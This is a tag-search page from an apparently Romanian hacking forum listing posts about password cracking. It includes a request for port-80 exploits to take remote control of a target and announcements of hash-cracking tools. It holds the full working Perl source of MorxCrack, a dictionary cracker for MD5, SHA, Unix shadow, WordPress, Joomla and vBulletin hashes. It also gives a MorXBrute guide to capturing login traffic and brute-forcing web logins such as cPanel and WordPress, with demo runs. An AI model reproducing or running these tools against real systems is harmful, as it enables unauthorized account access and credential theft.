Jump to content

Search the Community

Showing results for tags 'cracking'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges
    • Bug Bounty
    • Programare
    • Reverse engineering & exploit development
    • Mobile phones
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Sugestii
    • Linkuri
    • Cosul de gunoi
    • Cryptocurrency
  • Cumparaturi online's Topics
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Cumparaturi online's Test
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Web Development's Forum

Categories

There are no results to display.

There are no results to display.

Blogs

There are no results to display.

There are no results to display.


Location


Interests


Biography


Location


Interests


Occupation

Found 5 results

  1. port 80 HTTP exploit

    Salut, imi cer scuze pentru ca am postat in sectiunea gresita. Ma gandesc ca aici sunt la sectiunea potrivita. SI revin cu intrebarea: Cine ma poate ajuta sa identific vulnerabilitatiile port-ului 80? Ce exploit-uri pot sa folosesc ca sa obtin controlul remote asupra tintei. Pana acum am incercat tot felul si nu am reusit. Daca imi spune cineva ce imi scapa as fi recunoscator. Multumesc, Ossian.
  2. oclHashcat

    oclHashcat+ Advanced GPU Hash Cracking Utility 1.32 Download clHashcat For NVidia 1.32 Download
  3. MOSCRACK Multifarious On-demand Systems Cracker Moscrack is a PERL application designed to facilitate cracking WPA keys in parallel on a group of computers. This is accomplished by use of either Mosix clustering software, SSH or RSH access to a number of nodes. With Moscrack’s new plugin framework, hash cracking has become possible. SHA256/512, DES, MD5 and *Blowfish Unix password hashes can all be processed with the Dehasher Moscrack plugin. Some of Moscrack's features: Basic API allows remote monitoring Automatic and dynamic configuration of nodes Live CD/USB enables boot and forget dynamic node configuration Can be extended by use of plugins Uses aircrack-ng (including 1.2 Beta) by default CUDA/OpenCL support via Pyrit plugin CUDA support via aircrack-ng-cuda (untested) Does not require an agent/daemon on nodes Can crack/compare SHA256/512, DES, MD5 and blowfish hashes via Dehasher plugin Checkpoint and resume Easily supports a large number of nodes Desgined to run for long periods of time Doesn't exit on errors/failures when possible Supports mixed OS/protocol configurations Supports SSH, RSH, Mosix for node connectivity Effectively handles mixed fast and slow nodes or links Architecture independent Supports Mosix clustering software Supports all popular operating systems as processing nodes Node prioritization based on speed Nodes can be added/removed/modified while Moscrack is running Failed/bad node throttling Hung node detection Reprocessing of data on error Automatic performance analysis and tuning Intercepts INT and TERM signals for clean handling Very verbose, doesn't hide anything, logs agressively Includes a "top" like status viewer Includes CGI web status viewer Includes an optional basic X11 GUI Compatibility Moscrack itself should work with any Un*x variant, but it is developed and tested on Linux. Tested platforms for SSH based end nodes: Moscrack Live CD (SUSE) Ubuntu Linux 12.10 x86 64bit Ubuntu Linux 12.04.2 x86 64bit Ubuntu Linux 10.10 x86 64bit Ubuntu Linux 10.10 x86 32bit CentOS Linux 5.5 x86 32bit FreeBSD 8.1 x86 64bit Windows Vista Business 64bit w/Cygwin 1.7.7-1 Windows Vista Business 64bit w/Cygwin 1.7.9 Mac OS X 10.5.6 (iPC OSx86) Solaris Express 11 x64 iPhone 3g iOS 3.2.1 (Jailbroken) Samsung Galaxy S2 SGH-I727R (Cyanogenmod 10 + Linux chroot) Tested platforms for RSH based end nodes: Ubuntu Linux 10.10 x86 64bit Windows Vista Business 64bit w/Cygwin 1.7.7-1 Windows Vista Business 64bit w/Cygwin 1.7.9 Tested platforms for Mosix end nodes: Ubuntu Linux 10.10 x86 64bit Ubuntu Linux 10.10 x86 32bit Tested platforms for Moscrack server: Ubuntu Linux 13.10 x86 64bit Ubuntu Linux 12.10 x86 64bit Ubuntu Linux 10.10 x86 64bit Download: moscrack-2.08b.tar.gz Sources: moscrack | Free Security & Utilities software downloads at SourceForge.net Moscrack
  4. Description: MorxCrack is a cracking tool written in Perl to perform a dictionary-based attack on various hashing algorithm and CMS salted-passwords. As of version 1.1 MorxCrack supports the following algorithms: MD5 MD5 (Twice) MD5 (PasswordSalt) MD5 (SaltPassword) SHA1 SHA1 (Twice) SHA1 (PasswordSalt) SHA1 (SaltPassword) SHA2 (256 Bits) SHA2 (512 Bits) MySQL (4.1+) Crypt UNIX (Shadow) And the following CMS: Joomla Wordpress (PHPass) VBulletin InvisionPowerBoard Author: Simo Ben youssef <Simo_at_morxploit_dot_com> MorXploit Research Version: MorXCrack V1.1 Beta MD5: 14d0295d3c9b7fd96f5ff2e8b9ca43a8 Release date: April 08 2013 Download: #!/usr/bin/perl -w # # Tool: MorxCrack v1.1 # Author: Simo Ben youssef # Contact: simo_at_morxploit_dot_com # Release date: 24 March 2013 # MorXploit Research # http://www.morxploit.com # # Download: # http://www.morxploit.com/morxcrack # # v1.1 Changes: # Added crack stats. # # Description: # Tool written in perl to perform a dictionary-based attack on various hashing algorithm and CMS salted-passwords. # # Currently supports the following algorithms: # MD5 # MD5 (twice) # SHA1 # SHA2 (256/512) # MySQL (4.1+) # Crypt UNIX (Shadow) # # Currently supports the following CMS: # Joomla # Wordpress (PHPass) # VBulletin # InvisionPowerBoard # # Usage: # perl morxcrack.pl <algorithm> <hash> <wordlist> <salt> # perl morxcrack.pl sha hash wordlist # perl morxcrack.pl crypt 'hash' wordlist # perl morxcrack.pl wordpress 'hash' wordlist # perl morxcrack.pl mysql hash wordlist # perl morxcrack.pl md5twice hash wordlist # # For CMS hashes, a salt is required. # # Usage: # perl morxcrack.pl joomla hash wordlist salt # perl morxcrack.pl vb hash wordlist salt # perl morxcrack.pl ipb hash wordlist salt # # Except for wordpress # perl morxcrack.pl wordpress 'hash' wordlist # # Important note: # Shadow file and Wordpress hashes need to be put between single quotes to avoid shell interpretation of $ character # # Modules: # Requires SHA, MD5 and PHPass modules. # # Install if missing: # perl -MCPAN -e 'install Authen::Passphrase::PHPass' # perl -MCPAN -e 'install Digest::SHA' # perl -MCPAN -e 'install Digest::MD5' # # Test on a Pentium® Dual-Core CPU T4500 @ 2.30GHz * 2 processor using md5 and a 3917096 wordlist: # # perl morxcrack.pl md5 83583d2b5ea4078b9b83f82254e5d564 all.txt # # [*] Hashed password set to 83583d2b5ea4078b9b83f82254e5d564 # [*] Algorithm/CMS set to md5 # [*] Wordlist set to all.txt # # [+] Cracking ... # ############################################################ # [+] Your password is morxploit # [+] found at line 3917096 # [+] Job took 16 seconds ############################################################ # # # Author discolaimer: # This code and all information contained in this entire document is for educational and demonstration purposes only. # Modification, use and publishing this information is entirely on your own risk. # I cannot be held responsible for any malicious use. Use at your own risk. use strict; use Digest::SHA; use Digest::MD5; use Authen::Passphrase::PHPass; system ('clear'); if(!defined ($ARGV[0]&& $ARGV[1]&& $ARGV[2])) { usage(); } sub usage{ print "\n--- MorxCrack Multi-Algorithm/CMS password cracking tool\n"; print "--- By Simo Ben youssef\n"; print "--- www.morxploit.com\n\n"; print "[-] An algorithm, a hash and a wordlist are required\n\n"; print "Usage: perl $0 <algorithm> <hash> <wordlist> <salt>\n\n"; print "Example:\n"; print "perl $0 sha hash wordlist\n"; print "perl $0 sha256 hash wordlist\n"; print "perl $0 sha512 hash wordlist\n"; print "perl $0 md5 hash wordlist\n"; print "perl $0 mysql hash wordlist\n"; print "perl $0 crypt 'hash' wordlist\n"; print "perl $0 wordpress 'hash' wordlist\n"; print "perl $0 md5twice hash wordlist\n"; print "\nFor CMS salt-hashed passwords:\n"; print "perl $0 joomla hash wordlist salt\n"; print "perl $0 vb hash wordlist salt\n"; print "perl $0 wordpress 'hash' wordlist\n"; print "perl $0 ipb hash wordlist salt\n\n"; exit; } sub saltusage{ print "\n--- MorxCrack Multi-Algorithm/CMS password cracking tool\n"; print "--- By Simo Ben youssef\n"; print "--- www.morxploit.com\n\n"; print "[-] You need to specifiy a salt\n\n"; print "Usage: perl $0 <algorithm> <hash> <wordlist> <salt>\n"; print "perl $0 joomla hash wordlist salt\n"; print "perl $0 vb hash wordlist salt\n"; print "perl $0 ipb hash wordlist salt\n\n"; exit; } my $algo = $ARGV[0]; my $hash = $ARGV[1]; my $wordlist = $ARGV[2]; my $salt = $ARGV[3]; my $algoname = $algo; my $subalgo = \&$algoname; my $password; my $digest; my $timestart; $SIG{'INT'} = \&sigIntHandler; $SIG{TSTP} = \&sigTSTPHandler; if (grep { $algo eq $_ && $salt eq ""} qw{joomla vb ibp}) { saltusage(); } elsif (!grep { $algo eq $_} qw{md5 mysql crypt sha sha256 sha512 joomla md5twice wordpress vb ibp}) { usage(); } else { &crack(); } sub crack{ system ('clear'); open (LIST, $wordlist) || die "\n[-] Can't find/open $wordlist\n"; print "\n[*] Hashed password set to $hash\n"; print "[*] Algorithm/CMS set to $algo\n"; print "[*] Wordlist set to $wordlist\n"; print "[*] Control+c to check stats\n"; print "[*] Control+z to exit the program\n\n"; sleep(2); print "[+] Cracking ...\n\n"; $timestart = time(); while ($password = <LIST>) { chomp ($password); &$subalgo(); if ($digest eq $hash) { my $timeend = time(); my $runtime = $timeend - $timestart; print "############################################################\n"; print "[+] Your password is $password\n"; print "[+] Found at line $. of $wordlist\n"; print "[+] Cracked in $runtime seconds\n"; print "############################################################\n\n"; close(LIST); exit; } } my $timeend = time(); my $runtime = $timeend - $timestart; print "############################################################\n"; print "[-] Failed: Couldn't crack the password!\n"; print "[+] Processed $. passwords in $runtime seconds\n"; print "############################################################\n\n"; exit; } sub sha{ use Digest::SHA; my $sha = Digest::SHA->new; $sha->add($password); $digest = $sha->hexdigest; } sub sha256{ my $sha = Digest::SHA->new(256); $sha->add($password); $digest = $sha->hexdigest; } sub sha512{ my $sha = Digest::SHA->new(512); $sha->add($password); $digest = $sha->hexdigest; } sub mysql{ # round 1 hashing my $sha1 = Digest::SHA1->new; $sha1->add($password); my $digest1 = $sha1->digest; # round 2 hashing my $sha1_2 = Digest::SHA1->new; $sha1_2->add($digest1); $digest = $sha1_2->hexdigest; } sub crypt{ $digest = crypt($password, $hash); } sub md5{ my $md5 = Digest::MD5->new; $md5->add($password); $digest = $md5->hexdigest; } sub joomla{ my $key = $password.$salt; my $md5 = Digest::MD5->new; $md5->add($key); $digest = $md5->hexdigest; } sub md5twice{ #round 1 my $md5 = Digest::MD5->new; $md5->add($password); my $digest1 = $md5->hexdigest; #round 2 my $md52 = Digest::MD5->new; $md52->add($digest1); $digest = $md52->hexdigest; } sub vb { # round 1 my $md5 = Digest::MD5->new; $md5->add($password); my $digest1 = $md5->hexdigest; # round 2 my $key = $digest1.$salt; my $md52 = Digest::MD5->new; $md5->add($key); $digest = $md5->hexdigest; } sub ibp { #round 1 my $md5 = Digest::MD5->new; $md5->add($password); my $digest1 = $md5->hexdigest; #round 2 my $md52 = Digest::MD5->new; $md52->add($salt); my $digest2 = $md52->hexdigest; my $key = $digest2.$digest1; # round 3 my $final = Digest::MD5->new; $final->add($key); $digest = $md5->hexdigest; } sub wordpress{ my ($h, $wpsalt, $hash2)=$hash=~m/^(.{4})(.{8})(.+)/; my $ppr = Authen::Passphrase::PHPass->new( cost => 11, salt => "$wpsalt", passphrase => "$password"); my $userpassword = $ppr->as_rfc2307; $digest = substr ($userpassword, 7); } sub sigIntHandler { my $sigtime = time(); my $cctime = $sigtime - $timestart; my $speed = $. / $cctime; print "\n############################################################\n"; print "[*] Current pwd: $password\n"; print "[*] Line number: $.\n"; print "[*] Time elapsed: $cctime\n"; print "[*] Speed: $speed pwd per second\n"; print "############################################################\n"; print "\n[+] Cracking ...\n"; } sub sigTSTPHandler { print "\n############################################################\n"; print "[+] Exiting at line $.\n"; print "[+] Aurevoir!\n"; print "############################################################\n\n"; sleep(2); close(LIST); exit; } Requirements: Perl 5 or older Additional modules: Authen::Passphrase::PHPass Usage: Usage for non-salted passwords: perl morxcrack.pl <algorithm> <’hash’> <wordlist> perl morxploit md5 ’83583d2b5ea4078b9b83f82254e5d564? wordlist.txt Usage for salted passwords: perl morxcrack.pl <algorithm> <’hash’> <wordlist> <salt> perl morxploit.pl joomla ‘a87248e5fc69972804f5bb93c873ee9d’ wordlist.txt 9W11uZafPxbe9xpL Demo: Test on a Pentium® Dual-Core CPU T4500 @ 2.30GHz * 2 processor using md5 and a 3917096 wordlist (43.4 MB): perl morxcrack.pl md5 ’83583d2b5ea4078b9b83f82254e5d564? all.txt [*] Hashed password set to 83583d2b5ea4078b9b83f82254e5d564 [*] Algorithm/CMS set to md5 [*] Wordlist set to all.txt [+] Cracking … ############################################################ # [+] Your password is morxploit # [+] found at line 3917096 # [+] Job took 16 seconds ############################################################ TODO: Get rid of PHPass module Support for more CMS Contribute: Your contribution is needed! Please submit your CMS password hashing methods to simo_at_morxploit_com Make sure to include software details such as name and version number. Also please feel free to submit all your suggestions and bugs. Thanks. Source: MorXCrack Multi-Algorithm/CMS password cracking tool | MorXploit Research
  5. Description: MorXBrute is a customizable HTTP dictionary-based password cracking tool written in Perl. MorXBrute comes with a few payloads for some of the most popular softwares and additionally let you add your own payload for your favorite HTTP software or website. MorXBrute supports both GET and POST brute forcing. MorXBrute was written for educational, demonstration and testing purposes only. Author cannot be held responsible for any malicious use or damage. You can redistribute it and/or modify it under the same terms as Perl itself. Author: Simo Ben youssef <Simo_at_morxploit_dot_com> MorXploit Research Version: MorXBrute v1.01 Beta MD5: b4ea3c6895b9996b72309cc91a5910f8 Release date: November 08 2013 Download: Link 1 Link 2 Requirements: Perl 5 or older Additional modules: None Usage: perl MorXBrute.pl <target:port> <user> <wordlist> <payload file> perl MorXBrute.pl localhost:80 admin password.lst payloads/wordpressv3.7.1 perl MorXBrute.pl update Payloads: As of version 1.01 MorXBrute includes payloads for: Bitrix cPanel everyone email platform Horde Moodle Wordpress Xoops Zimbra However the goal of MorXBrute is to be a customizable HTTP brute forcing tool by giving you the ability to create your own payloads and share them with others, please read below and feel free to contact me if you need help. How to generate Payloads: Generating your own payload for your target requires a little work, right now MorXBrute can’t do that for you, but I’m considering to add a payload generator in the future. MorXBrute works by sending either a POST or GET request to the target with the login and pass and any other data as required by the target script, MorXBrute proceeds then to read the server’s response for each request. The server’s response changes just as login parameters, but in most cases, after successful authentication, the server responds with a HTTP/1.1 302 Found and redirects the browser to a new location. In this case MorXBrute uses the regex Location: (.*) to distinguish between a successful and a failed login attempt. In some other cases, some scripts like joomla will assign a cookie and redirects you to the administration page either way, before the script validates login cookie. This makes brute forcing slower and is not supported by MorXBrute. First you will need a network sniffer or if you use Google Chrome you can use the built-in network sniffer in the Developer tools (CTRL + Shift + i). Personally I prefer to use ngrep which can be downloaded from: ngrep - network grep or apt-get install ngrep on Debian/Ubuntu and yum install ngrep on Red Hat/Fedora/Centos You can then run it to capture your target traffic to analyze by running: ngrep -q -d interface -W byline host target and port 80 > target.log ngrep -q -d wlan0 -W byline host mywordpresssite.com and port 80 > wordpress.log At the login page, send two requests, one with valid login credentiels and second with false login credentiels. Once done go back and check your ngrep logs and gather the following (in wordpress example). login script path: POST /wp-login.php Or when GET is used (not in wordpress case) GET /someotherscript.php posted data log=admin&pwd=somelamepassword&wp-submit=Log+In&redirect_to=http%3A%2F%2Fwww.testserver%2Fwp-admin%2F&testcookie=1 or log=admin&pwd=somelamepassword when GET is used (again not in word press case) GET /someotherscript.php?log=admin&pwd=somelamepassword on the successful login attempt log check the rest of the response headers to see if the server responded with a new location Example: Set-Cookie: wordpress_logged_in_b376718910d75b03e67817ec5d3badc4=admin%7C1563339904%7Cba04510cfb75c0a5094246a6f150baee; path=/; httponly. Location: http://testserver/wp-admin/ <——– HERE Content-Length: 0 Connection: close On the failed login attempt log check also for the location response. If you can’t find the location response in the failed login log then bingo that’s the server telling you that your password works, and that’s our key! Otherwise and if the server responds with the same location either way then it’s probably trying to validate the newly assigned cookie on the next step. In some rare cases, some scripts use the main restricted area (admin panel/mailbox etc) script to process login requests in this case you can easily find the regex key by looking either at the cookie value (BITRIX_SM_LOGIN=admin in Bitrix case) or anything different in the HTML code, a welcome message (Welcome user to inbox as an example) and add it in the payload as Welcome(.*?)to Payload file structure: The structure is very simple, there are 4 values seperated by comma “,” 1- POST: HTTP method (could be either POST or GET) 2- login.php: the login script path Note: this is the full path, if your script is installed in a subdirectory then you should include that too for example if your wordpress is installed in http://localhost/wordpress then you should include it in the payload (POST:wordpress/wp-login.php) 3- login parameters (login and password) Note: $user and $pwd are used by MorXBrute and should not be changed 4- MorXploit: Cookie value, change if required by the remote login 5- Regex key POST,login.php,login=$user&password=$pwd,MorXploit,Location:(.*) Note: Although wordpress takes other data paremeters besides log and pwd such as redirect_to and testcookie, it only requires those first two. Demo: POST Method: root@MorXploit:/home/simo/MorXBrute# perl MorXBrute.pl demo.opensourcecms.com:80 admin word.lst payloads/wordpressv3.7.1 =================================================== — MorXBrute v1.0 Beta HTTP password cracking tool — By Simo Ben youssef — www.morxploit.com =================================================== [*] target set to demo.opensourcecms.com:80 [*] user set to admin [*] Wordlist set to word.lst [*] payload set to payloads/wordpressv3.7.1 [+] Cracking … [-] test -> Failed [-] test123 -> Failed [-] testtest -> Failed [-] testest123 -> Failed [-] qwerty -> Failed [-] azerty -> Failed [-] password -> Failed [-] password123 -> Failed [-] x3demob -> Failed ============================================================ [+] CRACKED! Your password is demo123 [+] Found at line 10 of word.lst [+] Cracked in 6 seconds ============================================================ GET Method: root@MorXploit:/home/simo/MorXBrute# perl MorXBrute.pl x3demob.cpx3demo.com:2082 x3demob word.lst payloads/cpanelgetprov1.0 =================================================== — MorXBrute v1.0 Beta HTTP password cracking tool — By Simo Ben youssef — www.morxploit.com =================================================== [*] target set to x3demob.cpx3demo.com:2082 [*] user set to x3demob [*] Wordlist set to word.lst [*] payload set to payloads/cpanelgetprov1.0 [+] Cracking … [-] test -> Failed [-] test123 -> Failed [-] testtest -> Failed [-] testest123 -> Failed [-] qwerty -> Failed [-] azerty -> Failed [-] password -> Failed [-] password123 -> Failed ============================================================ [+] CRACKED! Your password is x3demob [+] Found at line 9 of word.lst [+] Cracked in 4 seconds ============================================================ TODO: Add SSL suport Add a payload generator And maybe more? Submit your payloads: Your contribution is needed! Please submit your payloads to simo_at_morxploit_com Make sure to include software/service details such as name, URL and version number Also please feel free to submit all your suggestions and bugs. Thanks and happy MorXBruteForcing! Source: MorXBrute HTTP Password cracking tool
×